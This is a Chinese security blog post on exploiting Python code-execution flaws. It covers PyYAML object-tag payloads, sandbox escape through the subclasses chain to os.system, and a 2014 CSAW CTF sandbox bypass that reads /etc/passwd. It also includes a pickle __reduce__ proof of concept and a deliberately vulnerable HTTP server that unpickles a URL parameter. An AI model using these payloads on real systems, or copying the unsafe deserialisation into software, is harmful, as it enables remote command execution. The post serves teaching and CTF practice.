python 中常见的命令代码执行漏洞的利用方式
详情可看http://www.polaris-lab.com/index.php/archives/375/
1 2 3 4 5 6 7 8
!!python /object /apply :os.system ["calc.exe" ] !!python/object/new:os.system ["calc.exe" ] !!python/object/apply:subprocess.check_output [[calc.exe]] !!python/object/apply:subprocess.check_output ["calc.exe" ] !!python/object/apply:subprocess.check_output [["calc.exe" ]] !!python/object/apply:os.system ["calc.exe" ] !!python/object/new:subprocess.check_output [["calc.exe" ]] !!python/object/new:os.system ["calc.exe" ]
yaml_verify.py
1 2
import yaml yaml.load(file('simple.yml' , 'r' ))
沙箱逃逸,就是在给我们的一个代码执行环境下(Oj或使用socat生成的交互式终端),脱离种种过滤和限制,最终成功拿到shell权限的过程
1 2 3 4 5 6 7 8 9 10
import os import subprocess import commands os.system('ifconfig' ) os.popen('ifconfig' ) commands.getoutput('ifconfig' ) commands.getstatusoutput('ifconfig' ) subprocess.call(['ifconfig' ],shell=True)
在Python里,这段[].class .base .subclasses ()魔术代码,不用import任何模块,但可调用任意模块的方法。
1 2 3
<class 'site._Printer' > <class 'site.Quitter' > <class 'subprocess.Popen' >
命令执行代码
1 2 3 4 5 6 7
def cmdexec(cmd): magic = [].__class__.__base__.__subclasses__() for item in magic: if "<class 'site._Printer'>" == str(item): ret = item.__init__.__globals__['os' ].system(cmd) return ret print cmdexec('whoami' )
以2014 CSAW-CTF为例
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37
from __future__ import print_function print ("Welcome to my Python sandbox! Enter commands below!" )banned = [ "import" , "exec" , "eval" , "pickle" , "os" , "subprocess" , "kevin sucks" , "input" , "banned" , "cry sum more" , "sys" ] targets = __builtins__.__dict__.keys() targets.remove('raw_input' ) targets.remove('print' ) for x in targets: del __builtins__.__dict__[x] while 1: print (">>>" , end=' ' ) data = raw_input() for no in banned: if no.lower() in data.lower(): print ("[-] " + no) break else : exec data
解答
1 2 3 4 5 6
➜ python_sandbox_bypass python sandbox.py Welcome to my Python sandbox! Enter commands below! >>> s = 's' + 'ystem' >>> a = [].__class__.__base__.__subclasses__()[68].__init__.__globals__['o' +'s' ].__dict__展开 收缩
>>> a('cat /etc/passwd' ) nobody:*:-2:-2:Unprivileged User:/var/empty:/usr/bin/false
详情可看此文章reduce 方法来申明怎么序列化这个对象。这个方法返回一个字符串或者元组来描述当反序列化的时候该如何重构。
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16
import cPickle import os import urllib class genpoc(object): def __reduce__(self): s = "" "ipconfig" "" return os.system, (s,) e = genpoc() poc = cPickle.dumps(e) print pocprint urllib.quote(poc)fp = open("poc.pickle" ,"w" ) fp.write(poc)
dopickle.py
1 2
import pickle pickle.load(open('./poc.pickle' ))
现在问题来了,如何在实际的web环境中使用这些payload呢?
pickle_verify_httpserver.py
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33
import BaseHTTPServer import urllib import cPickle class ServerHandler(BaseHTTPServer.BaseHTTPRequestHandler): def do_GET(self): if "?payload" in self.path: query= urllib.splitquery(self.path) action = query[1].split('=' )[1] print action action = urllib.unquote(action) print action try: x = cPickle.loads(action) print x content = "command executed" except Exception,e: print e content = e else : content = "hello World" self.send_response(200) self.send_header("Content-type" ,"text/html" ) self.end_headers() self.wfile.write("<html>" ) self.wfile.write(" %s " % content) self.wfile.write("</html>" ) if __name__ == '__main__' : srvr = BaseHTTPServer.HTTPServer(('' ,8000), ServerHandler) print 'started httpserver...' srvr.serve_forever()
运行以上代码后,将运行一个监听本地8000端口的web服务器,通过如下URL访问,传递Payload给服务器。
http://127.0.0.1:8000/?payload=cnt%0Asystem%0Ap1%0A%28S%27ipconfig%27%0Ap2%0AtRp3%0A.参考文章:http://www.polaris-lab.com/index.php/archives/375/ )http://www.venenof.com/index.php/archives/360/ )https://www.tuicool.com/articles/2iIj2eR )https://security.tencent.com/index.php/blog/msg/106 )https://xz.aliyun.com/t/52/ )https://mp.weixin.qq.com/s?__biz=MzIzOTQ5NjUzOQ==&mid=2247483665&idx=1&sn=4b18de09738fdc5291634db1ca2dd55a )http://www.polaris-lab.com/index.php/archives/178/ )
FROM :blog.cfyqy.com | Author:cfyqy
评论